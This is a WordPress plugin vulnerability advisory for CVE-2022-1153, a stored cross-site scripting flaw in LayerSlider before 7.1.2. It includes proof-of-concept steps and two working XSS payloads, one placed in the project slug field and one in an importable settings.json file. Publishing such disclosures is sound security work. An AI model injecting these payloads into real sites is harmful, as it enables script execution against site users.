WordPress Plugin Vulnerabilities

LayerSlider < 7.1.2 - Admin+ Stored Cross-Site Scripting

Description

The plugin does not sanitise and escape Project's slug before outputting it back in various place, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html is disallowed

Proof of Concept

Proof of Concept  (PoC):
=======================
1.) The stored XSS is done in the template slug of any slider, a javascript payload is added to the SLUG input, which stores the malicious script executing the payload during the reopening of the template or when accessing different functions of the slider.

2.) The vulnerability also allows loading a configuration file (settings.json) with the malicious payload allowing it to be executed within the Slider edition.

## POC1: via (slug slider) 

1.) Add new project & Put Name
2.) Create Blank Project
3.) Project Settings & Tab Publish
4.) Add malicious code in the SLUG: "><img src onerror=alert(/XSS/)>
5.) Exit
6.) Save Project 
7.) XSS will trigger when accessing the project again for example (there seem to be other place when its triggered as well, like in the Project's settings)


## POC2 via (file,json)

1.) Add new post & Create Blank Project
2.) Import Projects
3.) Load file.json

{"properties":{"sliderVersion":"7.x","title":"Via Json","slug":"\">'><details\/open\/ontoggle=confirm('XSS')>","status":true,"schedule_start":"","schedule_end":"","type":"responsive","popupFitWidth":"","popupFitHeight":"","popupPositionHorizontal":"center","popupPositionVertical":"middle","popupWidth":"640","popupHeight":"360","popupDistanceTop":"10","popupDistanceRight":"10","popupDistanceBottom":"10","popupDistanceLeft":"10","popupShowOnTimeout":"","popupShowOnIdle":"","popupShowOnScroll":"","popupShowOnClick":"","popupCloseOnTimeout":"","popupCloseOnScroll":"","popup_repeat":true,"popup_repeat_days":"","popupShowOnce":true,"popup_pages_custom":"","popup_pages_exclude":"","popup_roles_administrator":true,"popup_roles_editor":true,"popup_roles_author":true,"popup_roles_contributor":true,"popup_roles_subscriber":true,"popup_roles_customer":true,"popup_roles_visitor":true,"popupTransitionIn":"fade","popupDurationIn":"1000","popupDelayIn":"200","popupTransitionOut":"fade","popupDurationOut":"500","popupResetOnClose":"slide","popupShowCloseButton":true,"popupCloseButtonStyle":"","popupOverlayClickToClose":true,"popupOverlayBackground":"rgba(0,0,0,.85)","popupOverlayTransitionIn":"fade","popupOverlayDurationIn":"400","popupOverlayTransitionOut":"fade","popupOverlayDurationOut":"400","width":1280,"height":720,"maxwidth":"","responsiveunder":"","fullSizeMode":"normal","fitScreenWidth":true,"allowFullscreen":true,"maxRatio":"","insertMethod":"prependTo","insertSelector":"","clipSlideTransition":"disabled","preventSliderClip":true,"hideunder":"","hideover":"","slideOnSwipe":true,"optimizeForMobile":true,"firstlayer":"1","autostart":true,"startinviewport":true,"pauseonhover":"disabled","keybnav":true,"touchnav":true,"playByScrollSpeed":"1","loops":"0","forceloopnum":true,"skin":"v6","sliderfadeinduration":"350","sliderclass":"","sliderstyle":"margin-bottom: 0px;","backgroundcolor":"","globalBGRepeat":"no-repeat","globalBGAttachment":"scroll","globalBGPosition":"50% 50%","globalBGSize":"auto","navprevnext":true,"navstartstop":true,"navbuttons":true,"hoverprevnext":true,"circletimer":true,"thumb_nav":"hover","thumb_container_width":"60%","thumb_width":"100","thumb_height":"60","thumb_active_opacity":"35","thumb_inactive_opacity":"100","autoplayvideos":true,"rememberUnmuteState":true,"autopauseslideshow":"auto","youtubepreview":"maxresdefault.jpg","slideBGSize":"cover","slideBGPosition":"50% 50%","parallaxSensitivity":"10","parallaxCenterLayers":"center","parallaxCenterDegree":"40","forceLayersOutDuration":"750","useSrcset":"inherit","enhancedLazyLoad":"inherit","preferBlendMode":"disabled","createdWith":"7.0.7"},"layers":[{"properties":{"post_offset":-1,"3d_transitions":"","2d_transitions":"","custom_3d_transitions":"","custom_2d_transitions":"","bgcolor":"","bgposition":"inherit","bgsize":"inherit","slidedelay":"","timeshift":0,"transitionduration":"","kenburnszoom":"disabled","kenburnsscale":1.2,"kenburnsrotate":"","globalhover":false,"parallaxtype":"2d","parallaxevent":"cursor","parallaxaxis":"both","parallaxdistance":10,"parallaxrotate":10,"parallaxdurationmove":1500,"parallaxdurationleave":1200,"parallaxtransformorigin":"50% 50% 0","parallaxtransformperspective":500,"layer_link":"","linkId":"","linkName":"","linkType":"","layer_link_target":"_self","layer_link_type":"over","deeplink":"","overflow":false,"customProperties":[],"post_content":false,"schedule_start":"","schedule_end":""},"sublayers":[],"meta":{"undoStackIndex":-1},"history":[]}]}

Affects Plugins

Plugin icon
LayerSlider
Fixed in 7.1.2

References

CVE
CVE-2022-1153

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
3.4 (low)

Miscellaneous

Original Researcher
Taurus Omar
Submitter
Taurus Omar
Submitter website
https://taurusomar.com
Submitter twitter
taurusomar_
Verified
Yes
WPVDB ID
1d9d5516-f1c3-4134-b6bf-7f2f890533c4

Timeline

Publicly Published
2022-03-29 (about 2 years ago)
Added
2022-03-29 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other

Published
Title
Published
2024-04-08
Title
Forminator < 1.29.3 - Contributor+ Stored Cross-Site Scripting via forminator_form Shortcode
Published
2015-10-05
Title
ResAds <= 1.0.1 - Reflected Cross-Site Scripting (XSS)
Published
2014-05-28
Title
Rezgo < 2.0.0 - Reflected Cross-Site Scripting
Published
2022-11-03
Title
Beautiful Cookie Consent Banner < 2.9.1 - Admin+ Stored XSS
Published
2023-07-20
Title
Elastic Email Sender < 1.2.7 - Admin+ Stored XSS